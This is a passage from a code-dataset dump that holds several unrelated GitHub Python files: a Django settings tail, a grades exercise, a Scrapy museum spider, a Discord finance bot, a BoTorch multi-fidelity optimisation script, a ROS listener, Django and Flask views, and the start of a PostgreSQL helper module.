\"/upl/\"\n\nEMAIL_SENDER_MAIL = \"admin@tripnsale.com\"\nEMAIL_SENDER_NAME = \"Trip & Sale\"\n\nENABLE_ACTIVATION = True\n\nEMAIL_DKIM_DOMAIN = None\nEMAIL_DKIM_SELECTOR = \"info\"\n\nENABLE_EMAIL = True\n\n# Use this structure in priv_settings (!!!!!) 
to make a pair with keys\n# DO NOT WRITE THE KEYS TO THE MAIN settings.py!\nclass _EmailKeys:\n def __init__(self, priv, pub, fromFiles=False):\n if fromFiles:\n with open(priv, 'r') as f:\n self.private = f.read()\n with open(pub, 'r') as f:\n self.public = f.read()\n else:\n self.private = priv\n self.public = pub\nEMAIL_DKIM_KEYS = None\n\nif os.path.isfile(os.path.join(BASE_DIR, \"tripnsale\", \"priv_settings.py\")):\n from tripnsale.priv_settings import *\n","repo_name":"boomeer/tripnsale","sub_path":"tripnsale/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27554212070","text":"#Exercise 3\n#Write a program that reads from the keyboard the 5 grades obtained\n#by a student (between 0 and 10).\n#It must then display all the grades, the average grade,\n#the highest grade obtained and the lowest.\n\ndef notas():\n notas=[]\n for i in range (5):\n x = int(input(\"Enter a grade: \"))\n while x < 0 or x > 10:\n print(\"ERROR, enter a valid grade from 0 to 10\")\n x = int(input(\"Enter a grade: \"))\n notas.append(x)\n minimo = min(notas)\n maximo = max (notas)\n suma = sum(notas)\n media = suma / len(notas)\n print(\"Your grades are: \",notas)\n print(\"Highest grade obtained: \", maximo)\n print(\"Lowest grade obtained: \", minimo)\n print(\"Mean / Average: \", media)\n \ndef main():\n notas()\nmain()","repo_name":"marcelofabiangutierrez88/cursoPython","sub_path":"Listas/Ejercicio3_ListaNotas.py","file_name":"Ejercicio3_ListaNotas.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32881310348","text":"import scrapy as scrapy\n\nfrom ..items import *\n\nclass Museum22(scrapy.Spider):\n name = \"Museum22\"\n allowed_domains = ['hebeimuseum.org.cn']\n start_urls = ['http://www.hebeimuseum.org.cn/']\n\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'mySpider.pipelines.MuseumPipeLine': 300,\n },\n 'DOWNLOADER_MIDDLEWARES': {\n 'mySpider.middlewares.DefaultMiddleware': 0,\n },\n }\n # Part that needs to be overridden\n def parse(self, response, **kwargs):\n item = MuseumBasicInformationItem()\n item[\"museumID\"] = 22\n item[\"museumName\"] = \"河北博物馆\"\n item[\"address\"] = \"河北省石家庄市东大街4号\"\n item[\"openingTime\"] = response.xpath('//*[@id=\"content\"]/div[1]/div[2]/div[2]/div[2]/p[1]/text()').extract_first()\n item[\"consultationTelephone\"] = \"(0311)966518\"\n item[\"introduction\"] = None\n item[\"publicityVideoLink\"] = None\n item[\"longitude\"] = \"117.1531\"\n item[\"latitude\"] = \"39.1747\"\n print(item)\n yield item\n","repo_name":"CS1803-SE/The-First-Subsystem","sub_path":"mySpider/spiders/Museum22.py","file_name":"Museum22.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2842072369","text":"import discord\r\nfrom discord import app_commands\r\nimport sqlite3\r\nfrom datetime import datetime, timedelta\r\nimport csv\r\n\r\ndef yesterday(frmt='%Y-%m-%d', string=True):\r\n yesterday = datetime.now() - timedelta(1)\r\n if string:\r\n return yesterday.strftime(frmt)\r\n return yesterday\r\n\r\nbalance = sqlite3.connect('SimpleClans.db').cursor().execute(\"SELECT balance From sc_clans WHERE name = 'Wolfsgilde'\").fetchall()\r\nintents = discord.Intents.default()\r\nclient = discord.Client(intents=intents)\r\ntree = 
app_commands.CommandTree(client)\r\n\r\ncsvpath = \"bank/\"+yesterday() + \".csv\"\r\n#csvpath = \"bank/2023-02-20.csv\"\r\noperation = ['DEPOSIT']\r\nlog = []\r\nout= \"\"\r\n\r\n# Open the CSV file\r\nwith open(csvpath, mode='r') as csv_file:\r\n    csv_reader = csv.DictReader(csv_file)\r\n\r\n    # Iterate over each row in the CSV file\r\n    for row in csv_reader:\r\n\r\n        # Check if the value in the 'column_name' column is equal to 'target_value'\r\n        if row['Operation'] in operation and row['Clan Name'] == 'Wolfsgilde':\r\n            if row['Operation'] == 'DEPOSIT':\r\n                log.append(row['Sender']+' deposited '+row['Amount']+'€.')\r\n                # print(row['Sender']+' deposited '+row['Amount']+'€.')\r\n                #print()\r\n\r\n@tree.command(name = \"finance\", description = \"Shows the financial record of yesterday.\")\r\nasync def first_command(interaction):\r\n    if(log):\r\n        out = \"\\n\".join(log)\r\n        await interaction.response.send_message(yesterday()+\"\\n\"+out)\r\n    else:\r\n        await interaction.response.send_message(yesterday()+\"\\nThere were no deposits or withdrawals.\")\r\n\r\n@tree.command(name = \"balance\", description = \"Shows the balance we had this morning at 0:00.\") \r\nasync def first_command(interaction):\r\n    await interaction.response.send_message(\"The guild account balance was closed yesterday at \" + str(balance).translate({ord(i): None for i in '[(,)]'})+\"€.\")\r\n\r\n@client.event\r\nasync def on_ready():\r\n    await tree.sync()\r\n    print(\"Ready!\")\r\n\t\t\r\nclient.run(\"token\")","repo_name":"tzuzn/Wolfsgilde-Finanzbot","sub_path":"discordBot.py","file_name":"discordBot.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5868938377","text":"from typing import Callable\nimport torch\nimport gpytorch\nimport random\nimport numpy as np\nimport pdb, time, argparse, itertools, copy\nimport sys, os\nfrom collections import defaultdict\n\nsys.path.append('../')\n\nfrom botorch.models import SingleTaskGP, KroneckerMultiTaskGP, MultiTaskGP\nfrom botorch.fit import fit_gpytorch_model\nfrom botorch.acquisition.knowledge_gradient import qKnowledgeGradient, qMultiFidelityKnowledgeGradient\nfrom botorch.acquisition.monte_carlo import qExpectedImprovement, qNoisyExpectedImprovement\nfrom botorch.sampling.samplers import SobolQMCNormalSampler, IIDNormalSampler\nfrom botorch.optim import optimize_acqf, optimize_acqf_mixed\nfrom botorch.optim.initializers import gen_one_shot_kg_initial_conditions\nfrom botorch.acquisition.objective import LinearMCObjective, ScalarizedPosteriorTransform\nfrom botorch.acquisition.utils import project_to_target_fidelity\nfrom botorch.acquisition.fixed_feature import FixedFeatureAcquisitionFunction\nfrom botorch.acquisition import PosteriorMean\nfrom botorch.models.cost import AffineFidelityCostModel\nfrom botorch.acquisition.cost_aware import InverseCostWeightedUtility\nfrom botorch.models.kernels.exponential_decay import ExponentialDecayKernel\n\nfrom gpytorch.mlls import ExactMarginalLogLikelihood\nfrom gpytorch.kernels import ScaleKernel, MaternKernel, IndexKernel, ProductKernel\nfrom gpytorch.priors.torch_priors import GammaPrior\n\nfrom .models.kernels import ModifiedIndexKernel, IndicatorKernel\nfrom .utils.plotting import plot_progress, plot_acqf_vals_and_fidelities\nfrom .utils.multi_task_fidelity_utils import get_fidelity_covariance, print_kernel_hyperparams, process_multitask_data, expand_intermediate_fidelities, \\\n    get_task_covariance, 
get_task_fidelity_covariance\n\n# TODO: import a list of kernels that I can call by string\n\ndef BO_trial(\n problem_evaluate: Callable,\n problem_name: str,\n #input_dim: int,\n param_ranges: dict,\n algo: str,\n n_initial_pts: int,\n n_bo_iter: int,\n trial: int,\n restart: bool,\n verbose: bool,\n is_multitask = True,\n kernel_name = 'matern_expdecay_index_product',\n multifidelity_params = None,\n checkpoint_fidelities = None,\n **tkwargs\n ):\n\n # Get script directory\n script_dir = os.path.dirname(os.path.realpath(sys.argv[0]))\n results_folder = script_dir + \"/results/\" + problem_name + \"/\" + algo + \"/\"\n\n print('starting trial {} for {}, saving results to {}'.format(trial, problem_name, results_folder))\n\n X = None\n y = []\n acqf_vals = torch.Tensor().cpu()\n sampled_fidelities = []\n\n num_checkpoints = len(checkpoint_fidelities)\n\n if multifidelity_params is not None:\n cost_model = AffineFidelityCostModel(\n fidelity_weights = multifidelity_params['fidelity_weights'], \n fixed_cost = multifidelity_params['fixed_cost'])\n cost_aware_utility = InverseCostWeightedUtility(cost_model=cost_model)\n fidelity_dim = multifidelity_params['fidelity_dim']\n target_fidelities = multifidelity_params['target_fidelities']\n if not is_multitask:\n def project(X):\n return project_to_target_fidelity(X=X, target_fidelities=target_fidelities)\n else:\n target_fidelities[fidelity_dim+1] = 0 # define the target task fidelity to be 0 (main task)\n def project(X):\n return project_to_target_fidelity(X=X, target_fidelities=target_fidelities)\n else:\n cost_model = AffineFidelityCostModel(fidelity_weights = {-1: 0}, fixed_cost = 1) # uniform cost 1 for all inputs\n cost_aware_utility = None\n project = None\n fidelity_dim = None\n\n if restart:\n # check if there is saved data available\n try: \n # get saved data\n X = torch.tensor(np.load(results_folder + 'X/X_' + str(trial) + '.npy'))\n y = torch.tensor(np.load(results_folder + 'output_at_X/output_at_X_' + str(trial) + '.npy'))\n\n runtimes = list(np.load(results_folder + 'runtimes/runtimes_' + str(trial) + '.npy'))\n log_best_so_far = list(np.load(results_folder + 'log_best_so_far_' + str(trial) + '.npy'))\n cum_costs = list(np.load(results_folder + 'cum_costs_' + str(trial) + '.npy'))\n\n init_batch_id = len(log_best_so_far)\n \n print('load saved data for trial {}, starting from iteration {}'.format(trial, init_batch_id))\n\n except:\n # generate initial data\n X = generate_initial_samples(n_initial_pts, param_ranges, trial)\n y = problem_evaluate(X)\n init_batch_id = 1\n\n np.save(results_folder + 'X/X_' + str(trial) + '.npy', X)\n np.save(results_folder + 'output_at_X/output_at_X_' + str(trial) + '.npy', y)\n\n log_best_so_far = []\n runtimes = []\n cum_costs = [cost_model(X).sum().item()] # evaluate cost of sampling initial X\n\n else:\n # generate initial data\n # X has shape (n_initial_pts) * (design_dim + 1)\n X = generate_initial_samples(n_initial_pts, param_ranges, trial)\n # y has shape (num_trials * num_checkpoints) x num_outputs\n y = problem_evaluate(X)\n # then, incorporate intermediate fidelities into X\n # expanded X has shape (n_initial_pts * num_checkpoints) * (design_dim + 1)\n X = expand_intermediate_fidelities(X, checkpoint_fidelities, last_dim_is_task = False)\n\n init_batch_id = 1\n\n np.save(results_folder + 'X/X_' + str(trial) + '.npy', X)\n np.save(results_folder + 'output_at_X/output_at_X_' + str(trial) + '.npy', y)\n\n log_best_so_far = []\n runtimes = []\n cum_costs = [cost_model(X[num_checkpoints-1 : : 
num_checkpoints]).sum().item()] # evaluate cost of sampling initial X\n \n print('loaded / generated data for {} BO iteration(s)'.format(init_batch_id))\n print('before BO start, X shape {}, y shape {}'.format(X.shape, y.shape))\n\n # if multi-output, process X and y to add task dimension to X\n num_outputs = y.shape[-1]\n if is_multitask:\n param_ranges['task_idx'] = ['int', [0, num_outputs-1]]\n # initial X does not contain the task column, so set add_last_col_X to True\n X, y = process_multitask_data(X, y, num_checkpoints, add_last_col_X = True)\n max_posterior_mean = [y[::num_outputs][(num_checkpoints-1)::num_checkpoints].max().item()]\n else:\n max_posterior_mean = [y.max().item()]\n\n bounds, is_int = get_param_bounds(param_ranges)\n print('bounds', bounds)\n print('is_int', is_int)\n\n weights = torch.cat((torch.tensor([1]), torch.zeros(num_outputs-1)))\n objective = ScalarizedPosteriorTransform(weights)\n\n print('number of outputs: {}; weights for linear objective: {}'.format(num_outputs, weights))\n\n # dictionary for logging data\n out = {}\n\n for iter in range(init_batch_id, n_bo_iter+1):\n \n print('starting BO iteration ', iter)\n\n start_time = time.time()\n\n # this calls fit_GP_model() inside\n new_pt, acqf_val, current_max_posterior_mean = optimize_acqf_and_suggest_new_pt(\n algo, X, y, objective, bounds, param_ranges, trial, is_multitask, kernel_name, is_int, \n cost_aware_utility, project, fidelity_dim, num_outputs, num_checkpoints)\n\n max_posterior_mean.append(current_max_posterior_mean)\n sampled_fidelities.append(new_pt[0][fidelity_dim].item())\n\n new_y = problem_evaluate(new_pt)\n print('evaluation of newly sampled point {}'.format(new_y))\n print('shape of evaluation of newly sampled point {}'.format(new_y.shape))\n print('shape of newly sampled point before checkpoint-fidelity expansion {}'.format(new_pt.shape))\n\n if is_multitask:\n # last dimension of new_pt is the task column\n new_pt = expand_intermediate_fidelities(new_pt, checkpoint_fidelities, last_dim_is_task = True)\n print('shape of newly sampled point after checkpoint-fidelity expansion {}'.format(new_pt.shape))\n\n new_pt, new_y = process_multitask_data(new_pt, new_y, num_checkpoints, add_last_col_X=True)\n print('shape of newly sampled point and evaluation after multi-task expansion {}, {}'.format(new_pt.shape, new_y.shape))\n else:\n new_pt = expand_intermediate_fidelities(new_pt, checkpoint_fidelities, last_dim_is_task = False)\n print('shape of newly sampled point after checkpoint-fidelity expansion {}'.format(new_pt.shape))\n\n acqf_vals = torch.cat((acqf_vals, acqf_val))\n\n if cost_model is not None:\n cum_costs.append(cum_costs[-1] + cost_model(new_pt)[-1].item())\n \n print('cumulative cost', cum_costs)\n\n runtimes.append(time.time() - start_time)\n\n X = torch.cat((X, new_pt), dim = 0)\n y = torch.cat((y, new_y), dim = 0)\n print('shape of X and y after concatenating new data point: ', X.shape, y.shape)\n\n # only log the best value of task 0 at the highest fidelity sampled, not the intermediate ones\n if not is_multitask:\n log_best_so_far = y[::num_checkpoints].cummax(0).values[n_initial_pts-1:]\n else:\n log_best_so_far = y[::num_outputs][(num_checkpoints-1)::num_checkpoints].cummax(0).values[n_initial_pts-1:]\n \n if verbose:\n print('Finished iteration {}, best value so far is {}'.format(iter, log_best_so_far[-1].item()))\n\n # save results in dictionary\n out['X'] = X\n out['Y'] = y\n out['runtimes'] = runtimes\n out['best_so_far'] = log_best_so_far\n out['acqf_vals'] = acqf_vals\n 
out['cum_costs'] = cum_costs\n\n torch.save(out, results_folder + 'trial_' + str(trial) + '_' + kernel_name) # TODO: make kernel name an input\n\n title = 'best objective value for ' + problem_name + ' with ' + algo\n if is_multitask:\n title += ' (multitask)'\n\n plot_progress([title, log_best_so_far], cum_costs, results_folder, trial, max_posterior_mean = max_posterior_mean)\n plot_acqf_vals_and_fidelities(acqf_vals, sampled_fidelities, results_folder, trial)\n\n\ndef fit_GP_model(X, y, is_multitask, kernel_name, is_int=None, num_outputs = None):\n\n # TODO: What kind of kernel to use is something we want to revisit later [P1]\n\n if not is_multitask:\n # if use_additive_kernel:\n # covar_module = ScaleKernel(MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1))) + \\\n # ScaleKernel(ExponentialDecayKernel(active_dims = torch.tensor([X.shape[-1]-1])))\n # else:\n # covar_module = ProductKernel(ScaleKernel(MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1))), \n # ExponentialDecayKernel(active_dims = torch.tensor([X.shape[-1]-1])) )\n\n # model = SingleTaskGP(X, y, covar_module=covar_module)\n # TODO: deal with the single task case later\n pass\n\n else:\n # change to single task GP with my custom kernel on {inputs} x fidelity x task\n # option 1: matern on inputs, exponentially decaying kernel on fidelity, index kernel on task\n # option 2: MISO kernel on {inputs} x task, exponentially decaying kernel on fidelity\n\n if kernel_name == 'matern_expdecay_index_product':\n covar_module = ProductKernel(\n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-2)),\n ExponentialDecayKernel(\n active_dims = torch.tensor([X.shape[-1]-2]), \n lengthscale_prior=GammaPrior(3.0, 6.0),\n # offset_prior=GammaPrior(3.0, 6.0),\n # power_prior=GammaPrior(3.0, 6.0)\n ),\n ModifiedIndexKernel(\n active_dims = torch.tensor([X.shape[-1]-1]), \n num_tasks=num_outputs,\n # prior=GammaPrior(3.0, 6.0)\n )\n )\n # Note to self: the reason I got rid of the prior is b/c if I apply them then fid kernel params are constantly at 0\n elif kernel_name == 'matern_index_product':\n covar_module = ProductKernel(\n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1)),\n ModifiedIndexKernel(\n active_dims = torch.tensor([X.shape[-1]-1]), \n num_tasks = num_outputs,\n )\n )\n elif kernel_name == 'matern_index_additive':\n covar_module = ProductKernel(\n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-2)),\n ModifiedIndexKernel(\n active_dims = torch.tensor([X.shape[-1]-1]), \n num_tasks=3,\n # prior=GammaPrior(3.0, 6.0)\n )\n ) + ProductKernel(\n IndicatorKernel(X.shape[-1]-1), \n MaternKernel(active_dims = torch.arange(0, X.shape[-1]-1))\n )\n elif kernel_name == 'matern_expdecay_index_additive':\n covar_module = ScaleKernel(MaternKernel(active_dims = torch.arange(0, X.shape[-1]-2))) + \\\n ScaleKernel(ExponentialDecayKernel(active_dims = torch.tensor([X.shape[-1]-2]))) + \\\n ScaleKernel(IndexKernel(active_dims = torch.tensor([X.shape[-1]-1]), num_tasks=num_outputs))\n else:\n print('kernel name is not recognized')\n \n model = SingleTaskGP(X, y, covar_module = covar_module) # TODO: check how the two ways of defining kernels differ\n\n # TODO: Later, explore kernels that deal with integers better\n\n mll = ExactMarginalLogLikelihood(model.likelihood, model)\n fit_gpytorch_model(mll)\n\n # TODO: saving (design, fidelity) is likely required for freeze-thaw\n # load state dict if it is passed\n # if state_dict is not None:\n # model.load_state_dict(state_dict)\n \n return model\n\ndef 
optimize_acqf_and_suggest_new_pt(\n algo, X, y, objective, bounds, param_ranges, trial, is_multitask, kernel_name, \n is_int=None, cost_aware_utility = None, project = None, \n fidelity_dim = None, num_outputs = None, num_fidelities = None, **kwargs):\n\n \"\"\" General steps for a non-random-sampling algorithm:\n 1. define and fit GP model\n 2. define sampler for evaluating the acqf\n 3. construct acqf\n 4. optimize acqf (w fixed feature if including fidelity)\n \"\"\"\n \n print('suggesting new point')\n\n if algo == 'random':\n return generate_initial_samples(1, param_ranges, seed = trial)\n\n elif algo == 'EI':\n model = fit_GP_model(X, y, is_multitask, kernel_name, is_int)\n # sampler = SobolQMCNormalSampler(num_samples=64)\n sampler = IIDNormalSampler(num_samples=64)\n if not is_multitask:\n best = y.max().item()\n else:\n best = objective(y).max().item() # TODO; change this, though not super urgent as I'm primarily using KG now\n \n # define acq function\n acqf = qExpectedImprovement(\n model = model, \n best_f = best, \n sampler = sampler, \n objective = objective\n )\n print('use EI, fit GP, best value is {}'.format(best))\n\n candidates, acqf_val = optimize_acqf(\n acq_function = acqf,\n bounds = bounds,\n q = 1, # TODO: figure out the following three\n num_restarts = 10,\n raw_samples = 512\n )\n\n elif algo == 'KG':\n\n # fit a multi output GP model\n model = fit_GP_model(X, y, is_multitask, kernel_name, is_int, num_outputs)\n\n # TODO: instead of printing, save these in a dictionary\n # if is_multitask:\n # print('task-fidelity covariance matrix', get_task_fidelity_covariance(model, X, num_outputs, num_fidelities))\n # print('task covariance matrix', get_task_covariance(model, X, num_outputs))\n # print('fidelity covariance matrix', get_fidelity_covariance(model))\n\n acqf = get_mfkg(model, objective, bounds, cost_aware_utility, project, fidelity_dim, is_multitask)\n\n current_max_posterior_mean = acqf.current_value\n\n # TODO: does fixing the task to be 0 affect the acqf optimization?\n # I think so, because it enforces evaluating the main task\n # But then the algorithm doesn't know that other tasks will be observed as well, \n # so the between-task correlation learned so far won't enter the decision process.\n\n # Sidenote: setting fixed_features here or not shouldn't matter b/c there's the project() operator already\n if is_multitask:\n fixed_features = {fidelity_dim + 1: 0} # fixed task to be 0\n else:\n fixed_features = None\n \n # generate KG initial conditions with fidelity fixed to 1 and task fixed to 0 (if multi-task)\n # note that bounds is still the full set of bounds, including those that were fixed during get_mfkg()\n\n X_init = gen_one_shot_kg_initial_conditions(\n acq_function = acqf,\n bounds=bounds,\n fixed_features = fixed_features,\n q=1,\n num_restarts=10, # default value is 20\n raw_samples=512, # default value is 1024\n options = {\n 'num_inner_restarts': 10, \n 'raw_inner_samples': 512, # default is 20 and 1024\n 'batch_limit': 5 # if this is not specified, raw_inner_samples posterior computations happen at the same time, leading to OOM\n } \n )\n \n candidates, acqf_val = optimize_acqf(\n acq_function = acqf,\n bounds = bounds, \n q = 1,\n num_restarts = 10, \n raw_samples = 512,\n fixed_features = fixed_features,\n batch_initial_conditions = X_init,\n options={\"batch_limit\": 5, \"maxiter\": 200}, # TODO: see if decreasing maxiter helps\n )\n \n if len(acqf_val.size()) == 0:\n acqf_val = acqf_val.unsqueeze(0)\n \n for i in 
range(candidates.shape[-1]):\n if is_int[i]:\n candidates[..., i] = torch.round(candidates[..., i])\n\n print('optimize MultiFidelityKG, get candidates ', candidates, ', acqf_val ', acqf_val)\n\n # delete model to free memory\n del model, acqf\n\n # candidates has shape q x (design_dim + 2) -- both fidelity and task are included\n return candidates, acqf_val, current_max_posterior_mean\n\n\ndef generate_initial_samples(n_samples, param_ranges, seed=None):\n\n if seed is not None:\n torch.manual_seed(seed)\n\n initial_X = torch.Tensor()\n\n for k, ranges in param_ranges.items():\n\n #if k == 'iteration_fidelity':\n # initial_X = torch.cat((initial_X, torch.ones(n_samples, 1)), dim = 1)\n # continue\n\n if ranges[0] == 'uniform':\n sample = torch.FloatTensor(n_samples, 1).uniform_(ranges[1][0], ranges[1][1])\n initial_X = torch.cat((initial_X, sample), dim = 1)\n \n elif ranges[0] == 'int':\n sample = torch.randint(ranges[1][0], ranges[1][1]+1, (n_samples, 1))\n initial_X = torch.cat((initial_X, sample), dim = 1)\n\n elif ranges[0] == 'discrete':\n vals = ranges[1]\n sample = torch.Tensor(random.choices(vals, k = n_samples))\n initial_X = torch.cat((initial_X, torch.unsqueeze(sample, 1)), dim = 1)\n \n return initial_X\n\ndef get_param_bounds(param_ranges):\n \n num_params = len(param_ranges)\n bounds = torch.empty(2, num_params)\n \n # also return the is_int feature to be passed into Matern kernel\n is_int = []\n\n for i, ranges in enumerate(param_ranges.values()):\n bounds[0,i] = min(ranges[1])\n bounds[1,i] = max(ranges[1])\n\n if ranges[0] in ['discrete', 'int']:\n is_int.append(True)\n else:\n is_int.append(False)\n \n return bounds.float(), is_int\n \n\ndef get_mfkg(model, objective, bounds, cost_aware_utility, project, fidelity_dim, is_multitask):\n\n if is_multitask:\n curr_val_acqf = FixedFeatureAcquisitionFunction(\n acq_function=PosteriorMean(model),\n d=fidelity_dim + 2, \n columns=[fidelity_dim, -1],\n values=[1, 0], # fix to fidelity = 1, task = 0 \n )\n _bounds = bounds[:,:-2]\n else:\n curr_val_acqf = FixedFeatureAcquisitionFunction(\n acq_function=PosteriorMean(model),\n d=fidelity_dim + 1, \n columns=[fidelity_dim],\n values=[1], # fix to fidelity = 1\n )\n _bounds = bounds[:,:-1]\n \n # get the largest mean (of the main task at highest fidelity) under the current posterior,\n # optimizing with respect to the designs only\n _, current_value = optimize_acqf(\n acq_function=curr_val_acqf,\n bounds = _bounds,\n q=1,\n num_restarts=10, \n raw_samples=128, \n options={\"batch_limit\": 10, \"maxiter\": 200},\n )\n\n print('current max posterior mean before sampling new points: {}'.format(current_value))\n \n # return the KG, the expected increase in best expected value conditioned on q more samples\n return qMultiFidelityKnowledgeGradient(\n model=model,\n num_fantasies=64, # sized down from 128, see how it affects memory\n current_value=current_value,\n cost_aware_utility=cost_aware_utility,\n project=project,\n )\n\n\n# TODO: Next is to understand how to correctly inspect the task-fidelity covariance!\n","repo_name":"zyyjjj/SGD_diagnostics","sub_path":"src/BO_trial.py","file_name":"BO_trial.py","file_ext":"py","file_size_in_byte":21655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23330866340","text":"#!/usr/bin/env python\n\nimport rospy\nimport argparse\nimport importlib\nimport numpy as np\nimport roslaunch\nfrom std_msgs.msg import (Header, String, Float64, Empty)\nfrom operator import itemgetter\nfrom roslib 
import message\n\nclass flag_listen(object):\n def __init__(self):\n print(\"init checkpoint\")\n rospy.init_node('flag_listener', anonymous=True)\n # subscriber to flag\n self.flagSubscriber = rospy.Subscriber(\"/flag_topic\", String, self.flag_callback)\n self.flag = False\n# rospy.spin()\n\n def flag_callback(self, msg):\n# rospy.loginfo(\"flag received\")\n print(msg)\n if msg.data == str(\"True\"):\n rospy.loginfo(\"flag received\")\n print(\"hello world\")\n self.flag = True\n if self.flag == True:\n print(\"hello again\")\n # insert TCST17_LR.py call here\n else:\n print(\"goodbye again\")\n# rospy.spin()\n else:\n rospy.logerr(\"flag not received\")\n print(\"goodbye world\")\n# rospy.spin()\n\n# def flag_result(self):\n# if self.flag == True:\n# print(\"hello again\")\n# else:\n# print(\"goodbye again\")\n# rospy.spin()\n\n#def callback(msg):\n# print(msg)\n# if msg.data == str(\"True\"):\n# print(\"hello world\")\n# else:\n# print(\"goodbye world\")\n\ndef main():\n# placeholder\n print(\"placeholder\")\n FC = flag_listen()\n# FC.flag_result()\n rospy.spin()\n\n# rospy.init_node('flag_listener', anonymous=True)\n# rospy.Subscriber(\"/flag_topic\", String, callback)\n\nif __name__ == '__main__':\n#\tinitialise()\n main()\n\n# taken from http://wiki.ros.org/roslaunch/API%20Usage\n# package = 'polish_sr300'\n# exectuable = 'TCST17_LR.py'\n# node = roslaunch.core.Node(package, executable)\n\n# launch = roslaunch.scriptapi.ROSLaunch()\n# launch.start()\n\n# process = launch.launch(node)\n# print process.is_alive()\n# process.stop()\n","repo_name":"sento86/sawyer_ws","sub_path":"src/polish_sr300/scripts/flag_listener_test.py","file_name":"flag_listener_test.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"29850689102","text":"from OpenGL import GL\nfrom PyQt6.QtWidgets import QApplication\n\nfrom scenes.plate_scene import PlateScene\n\nif __name__ == '__main__':\n app = QApplication([])\n screens = app.screens()\n\n widget = PlateScene(\n screens[-1]\n )\n widget.show()\n app.exec()\n","repo_name":"Infoboros/image-recognition-systems","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41569238496","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom .models import Films\nfrom django.views.generic import View, TemplateView\nfrom django.core.serializers import serialize\nimport json\n# Create your views here.\n\n\nclass IndexView(TemplateView):\n template_name = 'index.html'\n\n def get_context_data(self, *args, **kwargs):\n # context = super(IndexView, self).get_context_data(*args, **kwargs)\n films_limit = 20\n films = Films.objects.all()\n paginator = Paginator(films, films_limit)\n page_number = self.request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n return {'page_obj': page_obj}\n\n def load_more_films(request):\n films_limit = 20\n films = Films.objects.all()\n paginator = Paginator(films, films_limit)\n page = int(request.GET.get(\"page\"))\n page_obj = list(paginator.get_page(page))\n serialized_data = serialize(\"json\", page_obj)\n serialized_data = json.loads(\n serialized_data) if page <= paginator.num_pages else \"\"\n return JsonResponse(data={\"page_obj\": serialized_data})\n\n\nclass FilmView(TemplateView):\n template_name = 'film.html'\n\n def 
get_context_data(self, film, *args, **kwargs):\n # context = super(IndexView, self).get_context_data(*args, **kwargs)\n film_obj = Films.objects.get(pk=film)\n film_obj.film_genre = list(map(lambda elem: elem.strip(), film_obj.film_genre.split(\",\")))\n return {'film_obj': film_obj}\n\n\nclass GenreView(TemplateView):\n template_name = 'genres.html'\n\n def get_context_data(self, genre, *args, **kwargs):\n # context = super(IndexView, self).get_context_data(*args, **kwargs)\n films_limit = 20\n films = Films.objects.filter(film_genre__contains=genre).values()\n paginator = Paginator(films, films_limit)\n page_number = self.request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n # film_obj.film_genre = film_obj.film_genre.replace(\" \", \"\").split(\",\")\n return {'page_obj': page_obj, \"genre\": genre}\n\n def load_more_films(request, genre):\n films_limit = 20\n page = int(request.GET.get(\"page\"))\n films = Films.objects.filter(film_genre__contains=genre).values()\n paginator = Paginator(films, films_limit)\n page_obj = list(paginator.get_page(page))\n # serialized_data = serialize(\"json\", page_obj) # !!!\n # serialized_data = json.loads(\n # serialized_data) if page <= paginator.num_pages else \"\"\n return JsonResponse(data={\"page_obj\": page_obj if page <= paginator.num_pages else \"\"})\n","repo_name":"Taras-Romaniuk/ua_kino_clone","sub_path":"myfilms/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22605591141","text":"from flask import request, render_template, url_for, redirect, flash\nfrom app import models, db, app\n\n\ndef index():\n    transactions = models.Transactions.query.all()\n    return render_template('index-card.html', transactions=transactions)\n\n\ndef add_transaction():\n    transactions = models.Transactions.query.all()\n    if request.method == 'POST':\n        # form fields submitted via POST live in request.form, not the query string\n        period = request.form.get('period')\n        value = request.form.get('value')\n        status = request.form.get('status')\n        unit = request.form.get('unit')\n        subject = request.form.get('subject')\n        new_transaction = models.Transactions(period=period, value=value, status=status, unit=unit, subject=subject)\n        db.session.add(new_transaction)\n        db.session.commit()\n        return render_template('add_transaction.html', transactions=transactions)\n    return redirect(url_for('index'))\n\n","repo_name":"Bravo604/flask_transaction","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25553376526","text":"\"\"\"Support for PostgreSQL database interactions.\"\"\"\nimport getpass\nimport os\nimport socket\nimport logging\nimport subprocess\nfrom collections import namedtuple\n\nimport pexpect\nimport psycopg2\n\nfrom pydba.exc import DatabaseError, CommandNotFoundError\n\nlog = logging.getLogger(__name__)\n\n\nCONNECTION_FIELDS = [\n    'datname', 'datid', 'pid', 'state', 'application_name', 'query',\n    'usename', 'waiting', 'client_hostname', 'client_addr', 'client_port'\n]\n\nConnection = namedtuple('Connection', CONNECTION_FIELDS)\n\n\nSETTINGS_FIELDS = [\n    'name', 'setting', 'unit', 'category', 